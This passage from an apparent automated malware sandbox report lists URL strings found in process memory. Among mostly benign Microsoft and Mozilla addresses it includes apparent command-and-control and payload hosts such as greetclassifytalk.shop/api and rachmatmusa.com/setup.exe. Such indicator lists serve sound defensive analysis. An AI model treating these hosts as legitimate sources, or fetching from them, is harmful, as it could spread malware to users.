Source: explorer.exe, 00000001.00000000.1704418772.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2553473850.0000000009581000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2380968458.0000000009581000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2363463705.0000000009581000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2351852520.00000000095AD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2330969003.00000000095AD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2570047913.0000000009581000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2347997340.00000000095AD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2910098607.0000000009581000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000021.00000003.2553473850.0000000009581000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2380968458.0000000009581000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2363463705.0000000009581000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2351852520.00000000095AD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2330969003.00000000095AD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2570047913.0000000009581000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2347997340.00000000095AD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2910098607.0000000009581000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/o
Source: explorer.exe, 00000001.00000000.1704418772.00000000097D4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 00000021.00000002.2910098607.000000000963C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000021.00000003.2347997340.0000000009622000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2363463705.0000000009622000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2570047913.0000000009622000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2910098607.0000000009622000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2330969003.0000000009622000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2380968458.0000000009622000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2351852520.0000000009622000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 00000001.00000000.1704418772.00000000096DF000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
Source: explorer.exe, 00000001.00000000.1702723617.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2311006049.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2297814963.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2905755218.0000000007C00000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2293627468.0000000007C18000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2301195444.0000000007C01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 00000021.00000003.2297260361.0000000007BDE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2301195444.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2365444583.00000000094BB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2353479307.00000000094A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2346635158.00000000094C3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2910098607.000000000943F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2349419992.00000000094C3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000021.00000003.2349419992.000000000953E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2354557495.000000000953E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2346225625.000000000953E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2910098607.000000000953E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2365444583.000000000953E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2347014178.0000000009552000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2346635158.000000000953E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://arc.msn.come
Source: explorer.exe, 00000001.00000000.1704418772.00000000096DF000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://arc.msn.comi
Source: explorer.exe, 00000021.00000003.2297814963.0000000007BF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 00000021.00000003.2297814963.0000000007BF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000021.00000003.2297814963.0000000007BF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 00000001.00000000.1702723617.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2311006049.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2297814963.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2905755218.0000000007C00000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2293627468.0000000007C18000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2301195444.0000000007C01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: D3CC.exe, 00000015.00000003.2221713934.0000000001854000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: D3CC.exe, 00000015.00000003.2221713934.0000000001854000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: RegAsm.exe, 00000014.00000002.2397615202.0000000004316000.00000004.00000800.00020000.00000000.sdmp, D3CC.exe, 00000015.00000003.2190713092.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, D3CC.exe, 00000015.00000003.2190958296.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: explorer.exe, 00000021.00000003.2297814963.0000000007BF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13D4or
Source: explorer.exe, 00000021.00000003.2297814963.0000000007BF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13D4or-dark
Source: explorer.exe, 00000001.00000000.1702723617.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2311006049.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2297814963.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2905755218.0000000007C00000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2293627468.0000000007C18000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2301195444.0000000007C01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000001.00000000.1702723617.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2311006049.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2297814963.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2905755218.0000000007C00000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2293627468.0000000007C18000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2301195444.0000000007C01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000001.00000000.1702723617.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
Source: explorer.exe, 00000001.00000000.1702723617.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
Source: explorer.exe, 00000001.00000000.1702723617.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2311006049.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2297814963.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2905755218.0000000007C00000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2293627468.0000000007C18000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2301195444.0000000007C01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 00000001.00000000.1702723617.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2311006049.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2297814963.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2905755218.0000000007C00000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2293627468.0000000007C18000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2301195444.0000000007C01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 00000001.00000000.1702723617.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2311006049.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2297814963.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2905755218.0000000007C00000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2293627468.0000000007C18000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2301195444.0000000007C01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 00000001.00000000.1702723617.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2311006049.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2297814963.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2905755218.0000000007C00000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2293627468.0000000007C18000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2301195444.0000000007C01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: explorer.exe, 00000021.00000003.2293627468.0000000007C18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.z
Source: RegAsm.exe, 00000014.00000002.2397615202.0000000004316000.00000004.00000800.00020000.00000000.sdmp, D3CC.exe, 00000015.00000003.2190713092.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, D3CC.exe, 00000015.00000003.2190958296.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: RegAsm.exe, 00000014.00000002.2397615202.0000000004316000.00000004.00000800.00020000.00000000.sdmp, D3CC.exe, 00000015.00000003.2190713092.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, D3CC.exe, 00000015.00000003.2190958296.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: D3CC.exe, 00000015.00000003.2221713934.0000000001854000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: D3CC.exe, 00000015.00000003.2221713934.0000000001854000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: explorer.exe, 00000021.00000003.2347997340.000000000966E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2347061524.000000000966E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2346799231.0000000009489000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: RegAsm.exe, 00000014.00000002.2397615202.0000000004316000.00000004.00000800.00020000.00000000.sdmp, D3CC.exe, 00000015.00000003.2190713092.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, D3CC.exe, 00000015.00000003.2190958296.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: D3CC.exe, 00000015.00000003.2190713092.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, D3CC.exe, 00000015.00000003.2190958296.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RegAsm.exe, 00000014.00000002.2397615202.0000000004316000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtabS
Source: RegAsm.exe, 00000014.00000002.2397615202.0000000004316000.00000004.00000800.00020000.00000000.sdmp, D3CC.exe, 00000015.00000003.2190713092.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, D3CC.exe, 00000015.00000003.2190958296.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: explorer.exe, 00000001.00000000.1706298536.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000021.00000003.2347997340.0000000009622000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2363463705.0000000009622000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2330969003.0000000009622000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2351852520.0000000009622000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://excel.office.comj
Source: svchost.exe, 00000022.00000003.2298344648.000001BCF44C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: svchost.exe, 00000022.00000003.2298344648.000001BCF451A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: svchost.exe, 00000022.00000003.2298344648.000001BCF44C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: svchost.exe, 00000022.00000003.2298344648.000001BCF44A3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.2298344648.000001BCF44E8000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.2298344648.000001BCF4507000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000022.00000003.2298344648.000001BCF44C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000022.00000003.2298344648.000001BCF44C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: D3CC.exe, 00000015.00000002.2263138314.00000000017DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://greetclassifytalk.shop/
Source: D3CC.exe, 00000015.00000002.2263138314.00000000017DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://greetclassifytalk.shop/-
Source: D3CC.exe, 00000015.00000002.2263683731.0000000001861000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://greetclassifytalk.shop/api
Source: D3CC.exe, 00000015.00000003.2187461891.00000000017E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://greetclassifytalk.shop/api:
Source: D3CC.exe, 00000015.00000003.2187461891.00000000017E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://greetclassifytalk.shop/apif
Source: D3CC.exe, 00000015.00000002.2263138314.00000000017DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://greetclassifytalk.shop/n-
Source: D3CC.exe, 00000015.00000003.2210070632.0000000001856000.00000004.00000020.00020000.00000000.sdmp, D3CC.exe, 00000015.00000003.2209370190.0000000001854000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://greetclassifytalk.shop:443/api
Source: explorer.exe, 00000021.00000003.2297814963.0000000007BF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA12I8qo.img
Source: explorer.exe, 00000001.00000000.1702723617.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2311006049.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2297814963.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2905755218.0000000007C00000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2293627468.0000000007C18000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2301195444.0000000007C01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000001.00000000.1702723617.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2311006049.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2297814963.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2905755218.0000000007C00000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2293627468.0000000007C18000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2301195444.0000000007C01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 00000001.00000000.1702723617.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2311006049.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2297814963.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2905755218.0000000007C00000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2293627468.0000000007C18000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2301195444.0000000007C01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 00000001.00000000.1702723617.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2311006049.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2297814963.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2905755218.0000000007C00000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2293627468.0000000007C18000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2301195444.0000000007C01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 00000001.00000000.1702723617.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2311006049.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2297814963.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2905755218.0000000007C00000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2293627468.0000000007C18000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2301195444.0000000007C01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000001.00000000.1702723617.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2311006049.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2297814963.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2905755218.0000000007C00000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2293627468.0000000007C18000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2301195444.0000000007C01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 00000001.00000000.1702723617.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: D3CC.exe, 00000015.00000003.2221713934.0000000001854000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: svchost.exe, 00000022.00000003.2298344648.000001BCF44C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: svchost.exe, 00000022.00000003.2298344648.000001BCF4472000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: explorer.exe, 00000001.00000000.1706298536.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://outlook.com_
Source: explorer.exe, 00000001.00000000.1706298536.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://powerpoint.office.comcember
Source: RegAsm.exe, 00000014.00000002.2364194118.000000000336F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.2364194118.000000000337A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://rachmatmusa.com
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.2364194118.000000000336F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.2364194118.0000000003342000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://rachmatmusa.com/setup.exe
Source: explorer.exe, 00000001.00000000.1702723617.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2311006049.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2297814963.0000000007C01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2905755218.0000000007C00000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2293627468.0000000007C18000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2301195444.0000000007C01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: D3CC.exe, 00000015.00000003.2189885090.0000000003EEE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.microsof
Source: D3CC.exe, 00000015.00000003.2212428849.0000000003FBE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: D3CC.exe, 00000015.00000003.2212428849.0000000003FBE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: D3CC.exe, 00000015.00000003.2189885090.0000000003EEC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: D3CC.exe, 00000015.00000003.2189885090.0000000003EEC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: A5B6.exe, 00000011.00000002.2900242612.0000000000919000.00000004.00000020.00020000.00000000.sdmp, A5B6.exe, 00000011.00000002.2900242612.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A5B6.exe, 00000011.00000002.2900242612.00000000008B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://wetransfer.com/downloads/df01994dd8d37c2c33469922f8e7155a20240402134014/fd95b0
Source: explorer.exe, 00000021.00000003.2297260361.0000000007BDE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2301195444.0000000007C01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000021.00000003.2297260361.0000000007BDE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2301195444.0000000007C01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1706298536.000000000C557000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://wns.windows.com/L
Source: explorer.exe, 00000001.00000000.1706298536.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://word.office.com
Source: D3CC.exe, 00000015.00000003.2221713934.0000000001854000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: RegAsm.exe, 00000014.00000002.2397615202.0000000004316000.00000004.00000800.00020000.00000000.sdmp, D3CC.exe, 00000015.00000003.2190713092.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, D3CC.exe, 00000015.00000003.2190958296.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: D3CC.exe, 00000015.00000003.2221713934.0000000001854000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: RegAsm.exe, 00000014.00000002.2397615202.0000000004316000.00000004.00000800.00020000.00000000.sdmp, D3CC.exe, 00000015.00000003.2190713092.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, D3CC.exe, 00000015.00000003.2190958296.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: D3CC.exe, 00000015.00000003.2212428849.0000000003FBE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: D3CC.exe, 00000015.00000003.2212428849.0000000003FBE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: D3CC.exe, 00000015.00000003.2212428849.0000000003FBE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
